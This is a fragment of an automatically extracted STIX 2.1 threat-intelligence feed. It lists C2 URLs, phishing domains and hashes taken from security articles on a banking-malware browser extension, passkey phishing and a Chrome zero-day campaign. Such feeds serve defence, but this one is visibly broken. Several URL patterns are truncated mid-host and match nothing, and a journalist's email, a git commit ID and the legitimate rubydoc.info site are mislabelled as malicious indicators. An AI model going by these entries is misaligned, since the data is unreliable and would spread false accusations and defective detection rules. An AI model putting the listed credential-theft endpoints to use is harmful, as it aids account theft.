'https://archive[']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5d3b1ca7-388f-4023-a5af-06a98784cf60","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"url: https://connection[","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: dpoint, passing the campaign ID. In this sample, the URL is hxxps://connection[.]upgradeonline[.]site . Loader beacons to C2 Second stage:","pattern":"[url:value = 'https://connection[']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1c2b377d-805d-4797-95da-83eb98643022","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"url: https://granderevolucao[","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: r URL Malicious browser extension installer payload main-v2 hxxps://granderevolucao[.]store/5c92d3b8734b4f498752f735a1ca0987/{campaignId} .NET P","pattern":"[url:value = 'https://granderevolucao[']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cc46d229-3233-4108-a0f0-a190a716793d","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"url: https://ia601808[","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: er.exe : legit SentinelOne binary for side-loading sentinel hxxps://ia601808[.]us[.]archive[.]org/5/items/sentinel_20260722_0435/Sentinel","pattern":"[url:value = 'https://ia601808[']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--13e35181-670f-4802-9a36-ad9ccc9bb651","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"url: https://volmira[","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: intained. After retrieving the domains, the malware queries hxxps://volmira[.]site/api/ext/version to obtain the extension version. The","pattern":"[url:value = 'https://volmira[']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a2787923-c9b5-439b-8370-146b7828fcbf","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"url: https://zaviro[","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: two C2 endpoints: hxxps://volmira[.]site//api/savecreds and hxxps://zaviro[.]online//api/v1/fingerprint . The following POST request wa","pattern":"[url:value = 'https://zaviro[']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--64dfd049-7994-40a6-ba29-b3af6e9fa4d5","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"url: http://www[","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: attempting to download a page from the unregistered domain hxxp://www[.]creamp1eonlyfans[.]net . Because this domain should not re","pattern":"[url:value = 'http://www[']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7737bc8f-a889-4aa7-9b48-6c81008c61a7","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: add-passkey.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: keyhelpdesk[.]com secure-passkey[.]com setupmypasskey[.]com add-passkey[.]com integratedsso[.]com oktasession[.]com syncmykey[.]com por","pattern":"[domain-name:value = 'add-passkey.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--dab2d66c-ca61-4b48-b6af-59779025ce7b","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: domainlify.net","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: of the registered domains are below - service-nowinc[.]com domainlify[.]net Passkey-Themed Social Engineering Leads to Cloud Compromi","pattern":"[domain-name:value = 'domainlify.net']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8215242b-1b3a-4f89-b641-b7a1b16561e2","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: integratedsso.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: secure-passkey[.]com setupmypasskey[.]com add-passkey[.]com integratedsso[.]com oktasession[.]com syncmykey[.]com portalsetuphub[.]com It","pattern":"[domain-name:value = 'integratedsso.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f9571fed-e43d-4380-adaf-af8daae6757a","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: oktasession.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: setupmypasskey[.]com add-passkey[.]com integratedsso[.]com oktasession[.]com syncmykey[.]com portalsetuphub[.]com It's worth noting th","pattern":"[domain-name:value = 'oktasession.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6bfc06a0-9d88-4306-8b61-165b99ac5a4a","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: passkeyhelpdesk.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: in the pattern: \"<company name>.<malicious domain>[.]com\" - passkeyhelpdesk[.]com secure-passkey[.]com setupmypasskey[.]com add-passkey[.]c","pattern":"[domain-name:value = 'passkeyhelpdesk.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f9bccc6f-7a47-4e80-863e-2a6c7612d05a","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: portalsetuphub.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: .]com integratedsso[.]com oktasession[.]com syncmykey[.]com portalsetuphub[.]com It's worth noting that this modus operandi overlaps with","pattern":"[domain-name:value = 'portalsetuphub.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d0279abd-0efb-46d9-bd66-a3229e3702df","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: secure-passkey.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: any name>.<malicious domain>[.]com\" - passkeyhelpdesk[.]com secure-passkey[.]com setupmypasskey[.]com add-passkey[.]com integratedsso[.]co","pattern":"[domain-name:value = 'secure-passkey.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0c1bbefc-413c-47c0-9d0c-b1ba34ed6b04","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: service-nowinc.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: and individuals. Some of the registered domains are below - service-nowinc[.]com domainlify[.]net Passkey-Themed Social Engineering Leads","pattern":"[domain-name:value = 'service-nowinc.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--21bdee5e-4663-48d7-b1cd-3be4efbe707b","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: setupmypasskey.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: domain>[.]com\" - passkeyhelpdesk[.]com secure-passkey[.]com setupmypasskey[.]com add-passkey[.]com integratedsso[.]com oktasession[.]com s","pattern":"[domain-name:value = 'setupmypasskey.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--40c896c0-551d-4597-a600-73dc9485722a","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: syncmykey.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: com add-passkey[.]com integratedsso[.]com oktasession[.]com syncmykey[.]com portalsetuphub[.]com It's worth noting that this modus op","pattern":"[domain-name:value = 'syncmykey.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cdaa9626-3173-498b-9379-71cc1b16694d","created":"2026-09-13T01:10:01.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha1: 072558bc1a539e9936584647df51fb1797c982b0","description":"Seen in \"Re: UnrealIRCd 6.2.7 released & hot-patch to fix security issues for existing installations\" (oss-security). Context: mes writes: https://github.com/unrealircd/unrealircd/commit/072558bc1a539e9936584647df51fb1797c982b0. It's a great example of the shape of many LLM-reported (I'","pattern":"[file:hashes.'SHA-1' = '072558bc1a539e9936584647df51fb1797c982b0']","pattern_type":"stix","valid_from":"2026-09-13T01:10:01.000Z","labels":["auto-extracted","vulnerability"],"confidence":30,"external_references":[{"source_name":"oss-security","url":"https://seclists.org/oss-sec/2026/q3/729"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2d2e9edf-44f0-468b-b35b-69232f83321d","created":"2026-09-12T14:40:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"email: mail@journalistjagmeet.com","description":"Seen in \"Revolut confirms customer data breach through fake government requests\" (TechCrunch · Security). Context: You can contact or verify outreach from Jagmeet by emailing mail@journalistjagmeet.com . View Bio","pattern":"[email-addr:value = 'mail@journalistjagmeet.com']","pattern_type":"stix","valid_from":"2026-09-12T14:40:00.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"TechCrunch · Security","url":"https://techcrunch.com/2026/09/12/revolut-confirms-customer-data-breach-through-fake-government-requests/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--008c4487-30f5-4d67-a3ae-06d790b73cc7","created":"2026-09-12T10:24:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: gemini-advertisers.com","description":"Seen in \"When the Whole Company Adopts AI: What It Does to Your SOC\" (The Hacker News). Context: iated with Google and instead rely on the suspicious domain gemini-advertisers[.]com, indicating a brand impersonation attempt designed to dri","pattern":"[domain-name:value = 'gemini-advertisers.com']","pattern_type":"stix","valid_from":"2026-09-12T10:24:44.000Z","labels":["auto-extracted","research"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/when-whole-company-adopts-ai-what-it.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7c8e7a95-a1d8-48c2-8bd7-08c8fb86ad4e","created":"2026-09-12T09:07:56.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: rubydoc.info","description":"Seen in \"OpenAI Agents Linked to RubyGems Campaign That Gained RCE on RubyDoc Servers\" (The Hacker News). Context: The agents are said to have exploited a design quirk in the RubyDoc.info documentation build process to exfiltrate public data from","pattern":"[domain-name:value = 'rubydoc.info']","pattern_type":"stix","valid_from":"2026-09-12T09:07:56.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/openai-agents-linked-to-rubygems.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5bd31e9d-46ba-4751-b5f8-51c739d477c9","created":"2026-09-12T08:04:47.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: gitprogram.com","description":"Seen in \"China-Linked Hackers Chain Chrome Zero-Day With Windows Kernel Flaw in Attacks\" (GBHackers). Context: address UTA0560 Host associated with cloud.shinewrist[.]net gitprogram[.]com Domain JungleBamboo Phishing, exploit delivery, and C2 in","pattern":"[domain-name:value = 'gitprogram.com']","pattern_type":"stix","valid_from":"2026-09-12T08:04:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-chain-chrome-zero-day/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--451d70bb-49db-4aeb-a058-dfd539b214df","created":"2026-09-12T08:04:47.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: ocr.opusaccel.top","description":"Seen in \"China-Linked Hackers Chain Chrome Zero-Day With Windows Kernel Flaw in Attacks\" (GBHackers). Context: 0560 Exploit-hosting and command-and-control infrastructure ocr[.]opusaccel[.]top Domain UTA0560 GRIMWEDGE JScript backdoor C2 endpoint 2","pattern":"[domain-name:value = 'ocr.opusaccel.top']","pattern_type":"stix","valid_from":"2026-09-12T08:04:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-chain-chrome-zero-day/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fdad9722-7cf6-45af-95e8-21af97967395","created":"2026-09-12T08:04:47.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: shinewrist.net","description":"Seen in \"China-Linked Hackers Chain Chrome Zero-Day With Windows Kernel Flaw in Attacks\" (GBHackers). Context: Compromise Indicator Type Actor Description / SHA256 cloud.shinewrist[.]net Domain UTA0560 Exploit-hosting and command-and-control in","pattern":"[domain-name:value = 'shinewrist.net']","pattern_type":"stix","valid_from":"2026-09-12T08:04:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-chain-chrome-zero-day/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e7f9ab82-0981-4765-80d1-feb1acf62cd3","created":"2026-09-12T08:04:47.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 5eb5645511b00e4f4d73125654eeb3a3930fcf09c65685dc7f03f725331492e3","description":"Seen in \"China-Linked Hackers Chain Chrome Zero-Day With Windows Kernel Flaw in Attacks\" (GBHackers). Context: 256 UTA0560 msgbox.exe GRIMWEDGE loader, a Win32 executable 5eb5645511b00e4f4d73125654eeb3a3930fcf09c65685dc7f03f725331492e3 SHA-256 JungleBamboo a001 LONGTALE malicious Chrome extensi","pattern":"[file:hashes.'SHA-256' = '5eb5645511b00e4f4d73125654eeb3a3930fcf09c65685dc7f03f725331492e3']","pattern_type":"stix","valid_from":"2026-09-12T08:04:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-chain-chrome-zero-day/"}]}]}